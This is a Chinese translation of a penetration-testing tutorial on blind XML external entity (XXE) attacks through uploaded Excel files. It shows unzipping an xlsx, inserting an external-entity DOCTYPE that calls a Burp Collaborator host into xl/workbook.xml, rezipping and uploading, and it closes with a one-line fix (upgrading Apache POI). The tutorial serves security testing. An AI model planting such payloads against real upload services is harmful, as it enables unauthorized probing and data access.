0x00 前言

XML外部实体攻击非常常见，特别是通过基于HTTP的API，我们经常遇到并利用以此通常获得对客户端环境的特权访问。
不常见的是用Excel进行XXE攻击。

0x01 这是什么方式

实际上，与所有post-Office 2007文件格式一样，现代Excel文件实际上只是XML文档的zip文件。这称为Office Open XML格式或OOXML。
许多应用程序允许上传文件。有些处理内部数据并采取相应的操作，这几乎肯定需要解析XML。如果解析器未安全配置，则XXE几乎是不可避免的。
在这篇文章中，我专注于Excel只是因为处理Excel文件比使用Word文档或Powerpoint更常见，但它肯定并不罕见，本文中的任何内容都可能适用于这些应用程序。

0x02 入门

假设我们有一个接受Excel文件进行上传和处理的目标应用程序，我们就可以开始探测XXE了。相同的攻击有效负载可能会起作用，我们只需将它们放入Excel文件即可。
创建一个新的空白Excel文件。你可以在某些单元格中键入内容，但实际上并不是必需的。如果您没有安装Excel？您可以使用Google表格，然后下载为xlsx。
创建一个目录以将Excel文件解压缩并解压缩。

1
2
3
4
5
6
7
8
9
10
11
12

$ mkdir XXE && cd XXE
$ unzip ../XXE.xlsx # obviously use whatever your xlsx file is here
Archive:  ../XXE.xlsx
  inflating: xl/drawings/drawing1.xml
  inflating: xl/worksheets/sheet1.xml
  inflating: xl/worksheets/_rels/sheet1.xml.rels
  inflating: xl/sharedStrings.xml
  inflating: xl/styles.xml
  inflating: xl/workbook.xml
  inflating: xl/_rels/workbook.xml.rels
  inflating: _rels/.rels
  inflating: [Content_Types].xml

用于攻击应用程序的文件会有所不同，这在很大程度上取决于所使用的库。xl/workbook.xml提供了工作簿内容的概述，通常是大多数解析开始的地方，因为它将包含工作表及其名称的列表。单个工作表本身位于xl/worksheets目录下，通常内容最终会进入xl/sharedStrings.xml。

我在实际中发现了这一点，大多数应用程序似乎都会使用xl/workbook.xmlXML解析器来获取工作表列表，然后分别读取每个工作表以获取单元格内容。我还没有找到任何易受细胞影响的应用程序，但您的里程可能会有所不同。

鉴于这种方法，根据经验，通常最好先尝试xl/workbook.xml，这就是我将在这篇文章中展示的内容。就像将XXE有效负载添加到此文件一样简单，将内容压缩回Excel文件并将其上传到应用程序。

0x03 使用BURP COLLABORATOR对XXE进行盲测

在我们的演示应用程序中，无法将数据检索到HTTP响应中，因此所有这些XXE发现和利用都将是盲目的。我喜欢使用Burp Collaborator进行初始测试，因为阻止出站HTTP请求但允许DNS查询的情况并不少见。使用Collaborator我们可以看到两种交互并确认漏洞，即使我们可能无法轻易利用它。

打开Burp Suite Professional，单击Burp菜单并选择“Burp Collaborator client”将其打开。

单击“复制到剪贴板”。就我而言，值是gtdwmy7gvrncy5rvfu11kxzl2c82wr.burpcollaborator.net。现在我们将其插入到XML中。
打开xl/workbook.xml并将以下内容插入第2行和第3行。确保从Burp中粘贴你的值，而不是下面显示的值。:

1
2

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://gtdwmy7gvrncy5rvfu11kxzl2c82wr.burpcollaborator.net/"> ]>
<x>&xxe;</x>

你的xl/workbook.xml现在会是像这样。

现在将其压缩以创建新的Excel文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

$ zip -r ../poc.xslx *
updating: [Content_Types].xml (deflated 71%)
updating: _rels/ (stored 0%)
updating: _rels/.rels (deflated 60%)
updating: docProps/ (stored 0%)
updating: docProps/app.xml (deflated 51%)
updating: docProps/core.xml (deflated 50%)
updating: xl/ (stored 0%)
updating: xl/workbook.xml (deflated 56%)
updating: xl/worksheets/ (stored 0%)
updating: xl/worksheets/sheet1.xml (deflated 53%)
updating: xl/styles.xml (deflated 60%)
updating: xl/theme/ (stored 0%)
updating: xl/theme/theme1.xml (deflated 80%)
updating: xl/_rels/ (stored 0%)
updating: xl/_rels/workbook.xml.rels (deflated 66%)
updating: xl/sharedStrings.xml (deflated 17%)

现在将此poc.xlsx上传到你的应用程序。在这种情况下，有一个简单的ReactJS演示应用程序，它允许我们将文件拖入。你的应用程序应该会有所不同，但都是一个方式。

现在检查您的Burp Collaborator客户端，看看您是否有任何点击。

成功。我们已确认XXE。

0x04 总结

通过Excel利用XML外部攻击非常简单，一旦你找到它，基本上你通常使用的任何盲技术都将与更标准的HTTP请求一样利用。

防御：将poi架包升级至 3.17就可以解决

本文是EXPLOITING XXE WITH EXCEL的翻译文章

https://xz.aliyun.com/t/3741

FROM :b0urne.top | Author:b0urne